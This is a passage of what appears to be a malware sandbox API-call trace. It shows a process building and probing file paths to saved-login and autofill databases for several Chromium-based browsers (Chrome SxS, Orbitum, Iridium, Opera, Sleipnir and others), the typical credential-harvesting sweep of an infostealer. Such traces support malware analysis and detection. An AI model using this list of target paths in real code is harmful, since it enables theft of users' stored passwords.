hHeap=0x780000) returned 1 [0312.879] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.880] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.880] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 74 [0312.880] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x98) returned 0x79c2a8 [0312.881] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.882] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 0 [0312.882] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.882] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.883] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.884] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 82 [0312.884] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa8) returned 0x79c2c0 [0312.884] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.885] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 0 [0312.885] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.886] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.887] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.888] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 80 [0312.888] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa4) returned 0x79c2b8 [0312.888] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.889] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 0 [0312.889] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.889] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.890] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.891] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 63 [0312.891] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79c298 [0312.891] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.892] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 0 [0312.892] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.892] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.893] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.893] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 71 [0312.893] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x92) returned 0x79c2a8 [0312.894] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.895] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 0 [0312.895] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.895] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.896] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.896] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 72 [0312.896] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x94) returned 0x79c2c0 [0312.897] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.897] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 0 [0312.898] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.898] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.898] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.899] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 70 [0312.899] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x90) returned 0x79c2b8 [0312.899] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.900] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 0 [0312.900] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.900] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.901] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.902] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 53 [0312.902] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6e) returned 0x79c298 [0312.902] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.903] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 0 [0312.903] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.903] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.904] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.905] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 61 [0312.905] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7e) returned 0x79c2a8 [0312.905] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.906] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 0 [0312.906] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.906] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.907] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.907] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 72 [0312.907] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x94) returned 0x79c2c0 [0312.908] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.908] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 0 [0312.909] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.909] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.909] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.910] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 70 [0312.910] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x90) returned 0x79c2b8 [0312.910] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.911] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 0 [0312.911] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.911] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.912] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.913] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 53 [0312.913] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6e) returned 0x79c298 [0312.913] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.914] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 0 [0312.914] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.914] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.915] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.915] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 61 [0312.915] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7e) returned 0x79c2a8 [0312.916] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.917] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 0 [0312.917] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.922] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798120 | out: hHeap=0x780000) returned 1 [0312.926] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x798120 [0312.932] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0312.936] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x798120 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0312.946] GetProcessHeap () returned 0x780000 [0312.946] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798388 [0312.947] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.953] wvsprintfW (in: param_1=0x798388, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 89 [0312.953] GetProcessHeap () returned 0x780000 [0312.953] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb6) returned 0x79c318 [0312.953] GetProcessHeap () returned 0x780000 [0312.954] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0312.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.959] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 0 [0312.959] GetProcessHeap () returned 0x780000 [0312.960] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c318 | out: hHeap=0x780000) returned 1 [0312.960] GetProcessHeap () returned 0x780000 [0312.960] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798388 [0312.961] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.961] wvsprintfW (in: param_1=0x798388, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 87 [0312.961] GetProcessHeap () returned 0x780000 [0312.961] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb2) returned 0x79c310 [0312.961] GetProcessHeap () returned 0x780000 [0312.962] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0312.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.963] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 0 [0312.963] GetProcessHeap () returned 0x780000 [0312.963] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c310 | out: hHeap=0x780000) returned 1 [0312.963] GetProcessHeap () returned 0x780000 [0312.963] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798388 [0312.964] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.964] wvsprintfW (in: param_1=0x798388, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 70 [0312.964] GetProcessHeap () returned 0x780000 [0312.964] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x90) returned 0x79c2f0 [0312.965] GetProcessHeap () returned 0x780000 [0312.965] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0312.965] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.965] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 0 [0312.966] GetProcessHeap () returned 0x780000 [0312.966] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2f0 | out: hHeap=0x780000) returned 1 [0312.966] GetProcessHeap () returned 0x780000 [0312.966] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798388 [0312.966] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.967] wvsprintfW (in: param_1=0x798388, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 78 [0312.967] GetProcessHeap () returned 0x780000 [0312.967] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa0) returned 0x78a3d0 [0312.967] GetProcessHeap () returned 0x780000 [0312.968] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0312.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.969] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 0 [0312.969] GetProcessHeap () returned 0x780000 [0312.969] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78a3d0 | out: hHeap=0x780000) returned 1 [0312.969] GetProcessHeap () returned 0x780000 [0312.969] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798388 [0312.970] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.970] wvsprintfW (in: param_1=0x798388, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 95 [0312.970] GetProcessHeap () returned 0x780000 [0312.971] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc2) returned 0x78dd48 [0312.971] GetProcessHeap () returned 0x780000 [0312.971] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0312.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.972] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 0 [0312.972] GetProcessHeap () returned 0x780000 [0312.972] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78dd48 | out: hHeap=0x780000) returned 1 [0312.972] GetProcessHeap () returned 0x780000 [0312.972] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798388 [0312.973] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.973] wvsprintfW (in: param_1=0x798388, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 93 [0312.973] GetProcessHeap () returned 0x780000 [0312.973] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xbe) returned 0x79c310 [0312.973] GetProcessHeap () returned 0x780000 [0312.974] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0312.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.975] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 0 [0312.975] GetProcessHeap () returned 0x780000 [0312.975] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c310 | out: hHeap=0x780000) returned 1 [0312.975] GetProcessHeap () returned 0x780000 [0312.975] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798388 [0312.976] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.976] wvsprintfW (in: param_1=0x798388, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 76 [0312.976] GetProcessHeap () returned 0x780000 [0312.976] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x9c) returned 0x78a280 [0312.976] GetProcessHeap () returned 0x780000 [0312.977] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0312.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.977] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 0 [0312.978] GetProcessHeap () returned 0x780000 [0312.978] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78a280 | out: hHeap=0x780000) returned 1 [0312.978] GetProcessHeap () returned 0x780000 [0312.978] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798388 [0312.978] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.979] wvsprintfW (in: param_1=0x798388, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 84 [0312.979] GetProcessHeap () returned 0x780000 [0312.979] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xac) returned 0x79c300 [0312.979] GetProcessHeap () returned 0x780000 [0312.980] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0312.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.980] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 0 [0312.981] GetProcessHeap () returned 0x780000 [0312.981] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c300 | out: hHeap=0x780000) returned 1 [0312.981] GetProcessHeap () returned 0x780000 [0312.981] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798388 [0312.982] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.982] wvsprintfW (in: param_1=0x798388, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 118 [0312.982] GetProcessHeap () returned 0x780000 [0312.982] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xf0) returned 0x79c318 [0312.982] GetProcessHeap () returned 0x780000 [0312.983] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0312.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.983] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0312.984] GetProcessHeap () returned 0x780000 [0312.984] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c318 | out: hHeap=0x780000) returned 1 [0312.984] GetProcessHeap () returned 0x780000 [0312.984] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798388 [0312.985] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.985] wvsprintfW (in: param_1=0x798388, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 116 [0312.985] GetProcessHeap () returned 0x780000 [0312.985] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xec) returned 0x79c310 [0312.985] GetProcessHeap () returned 0x780000 [0312.986] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0312.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.986] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0312.987] GetProcessHeap () returned 0x780000 [0312.987] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c310 | out: hHeap=0x780000) returned 1 [0312.987] GetProcessHeap () returned 0x780000 [0312.987] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798388 [0312.987] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.988] wvsprintfW (in: param_1=0x798388, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 99 [0312.988] GetProcessHeap () returned 0x780000 [0312.988] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xca) returned 0x79c2f0 [0312.988] GetProcessHeap () returned 0x780000 [0312.989] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0312.989] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.989] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0312.989] GetProcessHeap () returned 0x780000 [0312.990] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2f0 | out: hHeap=0x780000) returned 1 [0312.990] GetProcessHeap () returned 0x780000 [0312.990] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798388 [0312.990] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.991] wvsprintfW (in: param_1=0x798388, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 107 [0312.991] GetProcessHeap () returned 0x780000 [0312.991] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xda) returned 0x79c300 [0312.991] GetProcessHeap () returned 0x780000 [0312.992] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0312.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.992] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0312.992] GetProcessHeap () returned 0x780000 [0312.993] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c300 | out: hHeap=0x780000) returned 1 [0312.993] GetProcessHeap () returned 0x780000 [0312.993] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798388 [0312.993] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.994] wvsprintfW (in: param_1=0x798388, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 119 [0312.994] GetProcessHeap () returned 0x780000 [0312.994] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xf2) returned 0x79c318 [0312.994] GetProcessHeap () returned 0x780000 [0312.994] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0313.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.003] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0313.005] GetProcessHeap () returned 0x780000 [0313.006] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c318 | out: 